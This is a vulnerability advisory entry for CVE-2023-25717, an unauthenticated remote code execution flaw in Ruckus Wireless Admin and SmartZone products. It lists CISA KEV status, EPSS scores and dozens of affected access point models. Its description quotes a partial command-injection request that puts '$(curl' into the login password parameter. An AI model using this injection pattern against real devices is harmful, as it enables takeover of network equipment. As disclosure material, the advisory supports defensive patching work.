Multiple Ruckus Wireless Products CSRF and RCE Vulnerability
Summary
| CVE | CVE-2023-25717 |
|---|---|
| State | PUBLIC |
| Assigner | [email protected] |
| Source Priority | CVE Program / NVD first with legacy fallback |
| Published | 2023-02-13 20:15:00 UTC |
| Updated | 2023-02-23 16:26:00 UTC |
| Description | Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring. |
Risk And Classification
EPSS: 0.942390000 probability, percentile 0.999270000 (date 2026-04-03)
CISA KEV: Listed on 2023-05-12; due 2023-06-02; ransomware use Unknown
Problem Types: CWE-94
CISA Known Exploited Vulnerability
| Vendor | Ruckus Wireless |
|---|---|
| Product | Multiple Products |
| Name | Multiple Ruckus Wireless Products CSRF and RCE Vulnerability |
| Required Action | Apply updates per vendor instructions or disconnect product if it is end-of-life. |
| Notes | https://support.ruckuswireless.com/security_bulletins/315; https://nvd.nist.gov/vuln/detail/CVE-2023-25717 |
NVD Known Affected Configurations (CPE 2.3)
| Type | Vendor | Product | Version | Update | Edition | Language |
|---|---|---|---|---|---|---|
| Hardware | Ruckuswireless | E510 | - | All | All | All |
| Hardware | Ruckuswireless | H320 | - | All | All | All |
| Hardware | Ruckuswireless | H350 | - | All | All | All |
| Hardware | Ruckuswireless | H500 | - | All | All | All |
| Hardware | Ruckuswireless | H510 | - | All | All | All |
| Hardware | Ruckuswireless | H550 | - | All | All | All |
| Hardware | Ruckuswireless | M510 | - | All | All | All |
| Hardware | Ruckuswireless | M510-jp | - | All | All | All |
| Hardware | Ruckuswireless | P300 | - | All | All | All |
| Hardware | Ruckuswireless | Q410 | - | All | All | All |
| Hardware | Ruckuswireless | Q710 | - | All | All | All |
| Hardware | Ruckuswireless | Q910 | - | All | All | All |
| Hardware | Ruckuswireless | R300 | - | All | All | All |
| Hardware | Ruckuswireless | R310 | - | All | All | All |
| Hardware | Ruckuswireless | R320 | - | All | All | All |
| Hardware | Ruckuswireless | R350 | - | All | All | All |
| Hardware | Ruckuswireless | R500 | - | All | All | All |
| Hardware | Ruckuswireless | R510 | - | All | All | All |
| Hardware | Ruckuswireless | R550 | - | All | All | All |
| Hardware | Ruckuswireless | R560 | - | All | All | All |
| Hardware | Ruckuswireless | R600 | - | All | All | All |
| Hardware | Ruckuswireless | R610 | - | All | All | All |
| Hardware | Ruckuswireless | R650 | - | All | All | All |
| Hardware | Ruckuswireless | R700 | - | All | All | All |
| Hardware | Ruckuswireless | R710 | - | All | All | All |
| Hardware | Ruckuswireless | R720 | - | All | All | All |
| Hardware | Ruckuswireless | R730 | - | All | All | All |
| Hardware | Ruckuswireless | R750 | - | All | All | All |
| Hardware | Ruckuswireless | R760 | - | All | All | All |
| Hardware | Ruckuswireless | R850 | - | All | All | All |
| Application | Ruckuswireless | Ruckus Wireless Admin | All | All | All | All |
| Operating System | Ruckuswireless | Smartzone | All | All | All | All |
| Operating System | Ruckuswireless | Smartzone | 6.1.0.0.935 | All | All | All |
| Operating System | Ruckuswireless | Smartzone Ap | All | All | All | All |
| Hardware | Ruckuswireless | Sz-144 | - | All | All | All |
| Hardware | Ruckuswireless | Sz-144-federal | - | All | All | All |
| Hardware | Ruckuswireless | Sz100 | - | All | All | All |
| Hardware | Ruckuswireless | Sz300 | - | All | All | All |
| Hardware | Ruckuswireless | Sz300-federal | - | All | All | All |
| Hardware | Ruckuswireless | T300 | - | All | All | All |
| Hardware | Ruckuswireless | T301n | - | All | All | All |
| Hardware | Ruckuswireless | T301s | - | All | All | All |
| Hardware | Ruckuswireless | T310c | - | All | All | All |
| Hardware | Ruckuswireless | T310d | - | All | All | All |
| Hardware | Ruckuswireless | T310n | - | All | All | All |
| Hardware | Ruckuswireless | T310s | - | All | All | All |
| Hardware | Ruckuswireless | T350c | - | All | All | All |
| Hardware | Ruckuswireless | T350d | - | All | All | All |
| Hardware | Ruckuswireless | T350se | - | All | All | All |
| Hardware | Ruckuswireless | T504 | - | All | All | All |
| Hardware | Ruckuswireless | T610 | - | All | All | All |
| Hardware | Ruckuswireless | T710 | - | All | All | All |
| Hardware | Ruckuswireless | T710s | - | All | All | All |
| Hardware | Ruckuswireless | T750 | - | All | All | All |
| Hardware | Ruckuswireless | T750se | - | All | All | All |
| Hardware | Ruckuswireless | T811-cm | - | All | All | All |
| Hardware | Ruckuswireless | T811-cmnon-spf | - | All | All | All |
| Hardware | Ruckuswireless | Zd1000 | - | All | All | All |
| Hardware | Ruckuswireless | Zd1100 | - | All | All | All |
| Hardware | Ruckuswireless | Zd1200 | - | All | All | All |
| Hardware | Ruckuswireless | Zd3000 | - | All | All | All |
| Hardware | Ruckuswireless | Zd5000 | - | All | All | All |
References
| Reference | Source | Link | Tags |
|---|---|---|---|
| Proof of Concept - Ruckus Wireless Admin (=<10.4 - Unauthenticated Remote Code Execution / CSRF / SSRF) - CYBIR - Cyber Security, Incident Response, & Digital Forensics | MISC | cybir.com | |
| 20230208 | Security Bulletins | Ruckus Wireless Support | MISC | support.ruckuswireless.com | |
| CVE Program record | CVE.ORG | www.cve.org | canonical |
| NVD vulnerability detail | NVD | nvd.nist.gov | canonical, analysis |
| CISA Known Exploited Vulnerabilities catalog | CISA | www.cisa.gov | kev |
No vendor comments have been submitted for this CVE.
Legacy QID Mappings
- 731238 Multiple Ruckus Wireless Products CSRF and RCE Vulnerabilities